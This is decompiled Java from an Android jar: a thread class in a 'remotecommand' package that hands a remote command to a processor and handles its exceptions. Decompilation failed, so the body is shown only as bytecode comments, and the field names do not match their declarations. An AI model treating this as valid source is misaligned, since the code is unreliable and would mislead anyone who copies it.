package com.vvt.remotecommand.a;

import com.vvt.remotecommand.RemoteCommand;
import com.vvt.remotecommand.processor.RemoteCommandProcessor;
import com.vvt.remotecommand.processor.c;

class f
  extends Thread
{
  private Object b;
  private RemoteCommand c;
  private RemoteCommandProcessor d;
  private c e;
  
  public f(b paramb, Object paramObject, RemoteCommandProcessor paramRemoteCommandProcessor, RemoteCommand paramRemoteCommand, c paramc)
  {
    this.b = paramObject;
    this.d = paramRemoteCommandProcessor;
    this.c = paramRemoteCommand;
    this.e = paramc;
  }
  
  /* Error */
  public void run()
  {
    // Byte code:
    //   0: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   3: istore_1
    //   4: iload_1
    //   5: ifeq +3 -> 8
    //   8: aload_0
    //   9: getfield 24	com/vvt/remotecommand/a/f:d	Lcom/vvt/remotecommand/processor/RemoteCommandProcessor;
    //   12: astore_2
    //   13: aload_0
    //   14: getfield 26	com/vvt/remotecommand/a/f:MyUncaughtExceptionHandler	Lcom/vvt/remotecommand/RemoteCommand;
    //   17: astore_3
    //   18: aload_0
    //   19: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   22: astore 4
    //   24: aload_2
    //   25: aload_3
    //   26: aload 4
    //   28: invokevirtual 38	com/vvt/remotecommand/processor/RemoteCommandProcessor:a	(Lcom/vvt/remotecommand/RemoteCommand;Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;)V
    //   31: aload_0
    //   32: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   35: astore_3
    //   36: aload_3
    //   37: monitorenter
    //   38: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   41: istore_1
    //   42: iload_1
    //   43: ifeq +3 -> 46
    //   46: aload_0
    //   47: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   50: astore_2
    //   51: aload_2
    //   52: invokevirtual 43	java/lang/Object:notify	()V
    //   55: aload_3
    //   56: monitorexit
    //   57: return
    //   58: astore_2
    //   59: invokestatic 45	com/vvt/remotecommand/a/removeFromPath:removeFromPath	()Z
    //   62: istore 5
    //   64: iload 5
    //   66: ifeq +3 -> 69
    //   69: aload_0
    //   70: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   73: astore_3
    //   74: aload_3
    //   75: ifnull +48 -> 123
    //   78: aload_0
    //   79: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   82: astore_3
    //   83: aload_0
    //   84: getfield 26	com/vvt/remotecommand/a/f:MyUncaughtExceptionHandler	Lcom/vvt/remotecommand/RemoteCommand;
    //   87: astore 4
    //   89: aload_0
    //   90: getfield 24	com/vvt/remotecommand/a/f:d	Lcom/vvt/remotecommand/processor/RemoteCommandProcessor;
    //   93: astore 6
    //   95: new 47	com/vvt/remotecommand/exception/RemoteCommandException
    //   98: astore 7
    //   100: aload_2
    //   101: invokevirtual 53	com/vvt/remotecontrol/RemoteControlException:getMessage	()Ljava/lang/String;
    //   104: astore_2
    //   105: aload 7
    //   107: aload_2
    //   108: invokespecial 56	com/vvt/remotecommand/exception/RemoteCommandException:<init>	(Ljava/lang/String;)V
    //   111: aload_3
    //   112: aload 4
    //   114: aload 6
    //   116: aload 7
    //   118: invokeinterface 61 4 0
    //   123: aload_0
    //   124: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   127: astore_3
    //   128: aload_3
    //   129: monitorenter
    //   130: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   133: istore_1
    //   134: iload_1
    //   135: ifeq +3 -> 138
    //   138: aload_0
    //   139: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   142: astore_2
    //   143: aload_2
    //   144: invokevirtual 43	java/lang/Object:notify	()V
    //   147: aload_3
    //   148: monitorexit
    //   149: goto -92 -> 57
    //   152: astore_2
    //   153: aload_3
    //   154: monitorexit
    //   155: aload_2
    //   156: athrow
    //   157: astore_2
    //   158: invokestatic 45	com/vvt/remotecommand/a/removeFromPath:removeFromPath	()Z
    //   161: istore 5
    //   163: iload 5
    //   165: ifeq +3 -> 168
    //   168: aload_0
    //   169: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   172: astore_3
    //   173: aload_3
    //   174: ifnull +31 -> 205
    //   177: aload_0
    //   178: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   181: astore_3
    //   182: aload_0
    //   183: getfield 26	com/vvt/remotecommand/a/f:MyUncaughtExceptionHandler	Lcom/vvt/remotecommand/RemoteCommand;
    //   186: astore 4
    //   188: aload_0
    //   189: getfield 24	com/vvt/remotecommand/a/f:d	Lcom/vvt/remotecommand/processor/RemoteCommandProcessor;
    //   192: astore 6
    //   194: aload_3
    //   195: aload 4
    //   197: aload 6
    //   199: aload_2
    //   200: invokeinterface 61 4 0
    //   205: aload_0
    //   206: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   209: astore_3
    //   210: aload_3
    //   211: monitorenter
    //   212: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   215: istore_1
    //   216: iload_1
    //   217: ifeq +3 -> 220
    //   220: aload_0
    //   221: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   224: astore_2
    //   225: aload_2
    //   226: invokevirtual 43	java/lang/Object:notify	()V
    //   229: aload_3
    //   230: monitorexit
    //   231: goto -174 -> 57
    //   234: astore_2
    //   235: aload_3
    //   236: monitorexit
    //   237: aload_2
    //   238: athrow
    //   239: astore_2
    //   240: invokestatic 45	com/vvt/remotecommand/a/removeFromPath:removeFromPath	()Z
    //   243: istore_1
    //   244: iload_1
    //   245: ifeq +3 -> 248
    //   248: aload_0
    //   249: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   252: astore_2
    //   253: aload_2
    //   254: ifnull +40 -> 294
    //   257: aload_0
    //   258: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   261: astore_2
    //   262: aload_0
    //   263: getfield 26	com/vvt/remotecommand/a/f:MyUncaughtExceptionHandler	Lcom/vvt/remotecommand/RemoteCommand;
    //   266: astore_3
    //   267: aload_0
    //   268: getfield 24	com/vvt/remotecommand/a/f:d	Lcom/vvt/remotecommand/processor/RemoteCommandProcessor;
    //   271: astore 4
    //   273: new 63	com/vvt/remotecommand/exception/ProcessingTimeoutException
    //   276: astore 6
    //   278: aload 6
    //   280: invokespecial 64	com/vvt/remotecommand/exception/ProcessingTimeoutException:<init>	()V
    //   283: aload_2
    //   284: aload_3
    //   285: aload 4
    //   287: aload 6
    //   289: invokeinterface 61 4 0
    //   294: aload_0
    //   295: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   298: astore_3
    //   299: aload_3
    //   300: monitorenter
    //   301: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   304: istore_1
    //   305: iload_1
    //   306: ifeq +3 -> 309
    //   309: aload_0
    //   310: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   313: astore_2
    //   314: aload_2
    //   315: invokevirtual 43	java/lang/Object:notify	()V
    //   318: aload_3
    //   319: monitorexit
    //   320: goto -263 -> 57
    //   323: astore_2
    //   324: aload_3
    //   325: monitorexit
    //   326: aload_2
    //   327: athrow
    //   328: astore_2
    //   329: invokestatic 45	com/vvt/remotecommand/a/removeFromPath:removeFromPath	()Z
    //   332: istore 5
    //   334: iload 5
    //   336: ifeq +3 -> 339
    //   339: aload_0
    //   340: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   343: astore_3
    //   344: aload_3
    //   345: ifnull +48 -> 393
    //   348: aload_0
    //   349: getfield 28	com/vvt/remotecommand/a/f:e	Lcom/vvt/remotecommand/processor/MyUncaughtExceptionHandler;
    //   352: astore_3
    //   353: aload_0
    //   354: getfield 26	com/vvt/remotecommand/a/f:MyUncaughtExceptionHandler	Lcom/vvt/remotecommand/RemoteCommand;
    //   357: astore 4
    //   359: aload_0
    //   360: getfield 24	com/vvt/remotecommand/a/f:d	Lcom/vvt/remotecommand/processor/RemoteCommandProcessor;
    //   363: astore 6
    //   365: new 47	com/vvt/remotecommand/exception/RemoteCommandException
    //   368: astore 7
    //   370: aload_2
    //   371: invokevirtual 67	java/lang/Throwable:getMessage	()Ljava/lang/String;
    //   374: astore_2
    //   375: aload 7
    //   377: aload_2
    //   378: invokespecial 56	com/vvt/remotecommand/exception/RemoteCommandException:<init>	(Ljava/lang/String;)V
    //   381: aload_3
    //   382: aload 4
    //   384: aload 6
    //   386: aload 7
    //   388: invokeinterface 61 4 0
    //   393: aload_0
    //   394: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   397: astore_3
    //   398: aload_3
    //   399: monitorenter
    //   400: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   403: istore_1
    //   404: iload_1
    //   405: ifeq +3 -> 408
    //   408: aload_0
    //   409: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   412: astore_2
    //   413: aload_2
    //   414: invokevirtual 43	java/lang/Object:notify	()V
    //   417: aload_3
    //   418: monitorexit
    //   419: goto -362 -> 57
    //   422: astore_2
    //   423: aload_3
    //   424: monitorexit
    //   425: aload_2
    //   426: athrow
    //   427: astore_2
    //   428: aload_0
    //   429: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   432: astore_3
    //   433: aload_3
    //   434: monitorenter
    //   435: invokestatic 33	com/vvt/remotecommand/a/removeFromPath:MyUncaughtExceptionHandler	()Z
    //   438: istore 8
    //   440: iload 8
    //   442: ifeq +3 -> 445
    //   445: aload_0
    //   446: getfield 22	com/vvt/remotecommand/a/f:removeFromPath	Ljava/lang/Object;
    //   449: astore 4
    //   451: aload 4
    //   453: invokevirtual 43	java/lang/Object:notify	()V
    //   456: aload_3
    //   457: monitorexit
    //   458: aload_2
    //   459: athrow
    //   460: astore_2
    //   461: aload_3
    //   462: monitorexit
    //   463: aload_2
    //   464: athrow
    //   465: astore_2
    //   466: aload_3
    //   467: monitorexit
    //   468: aload_2
    //   469: athrow
    // Local variable table:
    //   start	length	slot	name	signature
    //   0	470	0	this	f
    //   3	402	1	bool1	boolean
    //   12	40	2	localObject1	Object
    //   58	43	2	localRemoteControlException	com.vvt.remotecontrol.RemoteControlException
    //   104	40	2	localObject2	Object
    //   152	4	2	localObject3	Object
    //   157	43	2	localRemoteCommandException1	com.vvt.remotecommand.exception.RemoteCommandException
    //   224	2	2	localObject4	Object
    //   234	4	2	localObject5	Object
    //   239	1	2	localInterruptedException	InterruptedException
    //   252	63	2	localObject6	Object
    //   323	4	2	localObject7	Object
    //   328	43	2	localObject8	Object
    //   374	40	2	localObject9	Object
    //   422	4	2	localObject10	Object
    //   427	32	2	localObject11	Object
    //   460	4	2	localObject12	Object
    //   465	4	2	localObject13	Object
    //   22	430	4	localObject15	Object
    //   62	273	5	bool2	boolean
    //   93	292	6	localObject16	Object
    //   98	289	7	localRemoteCommandException2	com.vvt.remotecommand.exception.RemoteCommandException
    //   438	3	8	bool3	boolean
    // Exception table:
    //   from	to	target	type
    //   0	3	58	com/vvt/remotecontrol/RemoteControlException
    //   8	12	58	com/vvt/remotecontrol/RemoteControlException
    //   13	17	58	com/vvt/remotecontrol/RemoteControlException
    //   18	22	58	com/vvt/remotecontrol/RemoteControlException
    //   26	31	58	com/vvt/remotecontrol/RemoteControlException
    //   130	133	152	finally
    //   138	142	152	finally
    //   143	147	152	finally
    //   147	149	152	finally
    //   153	155	152	finally
    //   0	3	157	com/vvt/remotecommand/exception/RemoteCommandException
    //   8	12	157	com/vvt/remotecommand/exception/RemoteCommandException
    //   13	17	157	com/vvt/remotecommand/exception/RemoteCommandException
    //   18	22	157	com/vvt/remotecommand/exception/RemoteCommandException
    //   26	31	157	com/vvt/remotecommand/exception/RemoteCommandException
    //   212	215	234	finally
    //   220	224	234	finally
    //   225	229	234	finally
    //   229	231	234	finally
    //   235	237	234	finally
    //   0	3	239	java/lang/InterruptedException
    //   8	12	239	java/lang/InterruptedException
    //   13	17	239	java/lang/InterruptedException
    //   18	22	239	java/lang/InterruptedException
    //   26	31	239	java/lang/InterruptedException
    //   301	304	323	finally
    //   309	313	323	finally
    //   314	318	323	finally
    //   318	320	323	finally
    //   324	326	323	finally
    //   0	3	328	finally
    //   8	12	328	finally
    //   13	17	328	finally
    //   18	22	328	finally
    //   26	31	328	finally
    //   400	403	422	finally
    //   408	412	422	finally
    //   413	417	422	finally
    //   417	419	422	finally
    //   423	425	422	finally
    //   59	62	427	finally
    //   69	73	427	finally
    //   78	82	427	finally
    //   83	87	427	finally
    //   89	93	427	finally
    //   95	98	427	finally
    //   100	104	427	finally
    //   107	111	427	finally
    //   116	123	427	finally
    //   158	161	427	finally
    //   168	172	427	finally
    //   177	181	427	finally
    //   182	186	427	finally
    //   188	192	427	finally
    //   199	205	427	finally
    //   240	243	427	finally
    //   248	252	427	finally
    //   257	261	427	finally
    //   262	266	427	finally
    //   267	271	427	finally
    //   273	276	427	finally
    //   278	283	427	finally
    //   287	294	427	finally
    //   329	332	427	finally
    //   339	343	427	finally
    //   348	352	427	finally
    //   353	357	427	finally
    //   359	363	427	finally
    //   365	368	427	finally
    //   370	374	427	finally
    //   377	381	427	finally
    //   386	393	427	finally
    //   435	438	460	finally
    //   445	449	460	finally
    //   451	456	460	finally
    //   456	458	460	finally
    //   461	463	460	finally
    //   38	41	465	finally
    //   46	50	465	finally
    //   51	55	465	finally
    //   55	57	465	finally
    //   466	468	465	finally
  }
}


/* Location:              /Volumes/D1/codebase/android/POC/assets/product/maind/classes-enjarify.jar!/com/vvt/remotecommand/a/f.class
 * Java compiler version: 5 (49.0)
 * JD-Core Version:       0.7.1
 */